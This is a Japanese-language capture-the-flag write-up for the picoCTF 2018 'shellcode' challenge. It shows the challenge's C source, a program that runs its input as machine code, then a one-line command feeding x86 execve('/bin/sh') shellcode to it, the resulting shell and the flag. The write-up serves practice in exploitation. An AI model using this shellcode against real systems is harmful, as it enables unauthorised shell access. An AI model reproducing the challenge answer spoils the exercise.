picoCTF 2018: shellcode
問題
問題文
This program executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server. Source.
Hints
Maybe try writing some shellcode?
You also might be able to find some good shellcode online.
問題概要
解答例
指針
- shellcode を渡す
解説
与えられたプログラムのソースコードは以下の通り.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 148 #define FLAGSIZE 128 void vuln(char *buf){ gets(buf); puts(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid // this prevents /bin/sh from dropping the privileges gid_t gid = getegid(); setresgid(gid, gid, gid); char buf[BUFSIZE]; puts("Enter a string!"); vuln(buf); puts("Thanks! Executing now..."); ((void (*)())buf)(); return 0; }
どうやら文字列を受け取り, 受け取った文字列を機械語としてそのまま実行しているらしい.
タイトル通り, shellcode を入力として与え, execve("/bin/sh");
を実行すれば良い.
shellcode は下記のものを使った.
http://inaz2.hatenablog.com/entry/2014/03/13/013056
kira924age@pico-2018-shell-2:/problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4$ (python -c "print '\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'"; cat) | ./vuln Enter a string! 1▒Rh//shh/bin▒▒RS▒▒B ̀ Thanks! Executing now... ls flag.txt vuln vuln.c cat flag.txt picoCTF{shellc0de_w00h00_8b811b44}